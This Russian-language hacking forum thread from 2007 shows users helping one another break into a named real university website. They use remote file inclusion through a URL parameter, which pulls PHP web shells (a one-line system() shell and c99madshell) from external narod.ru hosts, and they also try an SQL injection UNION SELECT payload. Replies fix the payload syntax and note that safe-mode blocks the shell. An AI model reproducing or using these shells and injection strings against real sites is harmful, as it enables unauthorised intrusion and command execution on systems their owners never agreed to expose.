Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.09.2007, 17:04
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
PHP & SQL inj
привет всем..люди у мя такая проблема на сайте
http://sicurezza.uniss.it/
есть такое index.php?p= удаленный инклудинг...но по неизвестным мне причинам он не поддерживает например такое
PHP код:
<pre><? @system($_REQUEST['c']); ?></pre>
(который я кинул в txt и впихнул в НАРОД). В результате такая страница http://ихсайт/?p=http://что-то.narod.ru/file.txt?c=ls не катит. Но что самое удивидельное когда file.txt такой ссылка катит..вот не пойму с чего бы? 
а про SQL inj там еще есть такое
http://sicurezza.uniss.it/index.php?h=1&cat=-1'A
но не смог понята почиму он не принимает сам запрос такой результ
You have an error in your SQL syntax near 'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13/* ORDER BY data DESC ' at line 1 |
|
|
25.09.2007, 17:39
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Мда.
1) Не в том разделе
2) http://ихсайт/?p=http://что-то.narod.ru/file.txt&c=ls
|
|
|
|
25.09.2007, 17:53
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
ыы)
1. "Не в том разделе" ок..сорь)
2. http://ихсайт/?p=http://что-то.narod.ru/file.txt&c=ls ну понятно ж что так
http://sicurezza.uniss.it/index.php?p=http://axhack.narod.ru/1.txt?c=ls ))
|
|
|
|
25.09.2007, 18:29
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
http://sicurezza.uniss.it/index.php?p=http://dermoshell.narod.ru/c99madshell.php
Safe-mode: ON (secure)
Может поэтому?
|
|
|
|
25.09.2007, 18:32
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
не
<pre><? @system($_REQUEST['c']); ?></pre>
а
<pre><? @system(stripslashes($_REQUEST['c'])); ?></pre>
Должно работать... 
=========
ИМХО не в этом там проблема  но попытка не пытка 
Последний раз редактировалось Ponchik; 25.09.2007 в 18:41..
|
|
|
|
25.09.2007, 18:55
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Сообщение от Ponchik
не
<pre><? @system($_REQUEST['c']); ?></pre>
а
<pre><? @system(stripslashes($_REQUEST['c'])); ?></pre>
Должно работать...
=========
ИМХО не в этом там проблема но попытка не пытка При вкл. сейф моде ничего не будет работать. 
|
|
|
|
25.09.2007, 19:06
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
понятно огромное спс
|
|
|
|
25.09.2007, 19:09
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591
Репутация:
123
|
|
При включенном чейф моде юзай мозг)))
Ну или security lab на крайняк, методов обхода туча)
|
|
|
|
25.09.2007, 19:26
|
|
Постоянный
Регистрация: 22.08.2005
Сообщений: 540
Провел на форуме:
4372175
Репутация:
1221
|
|
Перемещено.
2Автор, в следующий раз будь внимательнее.
|
|
|
|
25.09.2007, 19:51
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
функция system() почти везде отключается, если админы грамотные.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
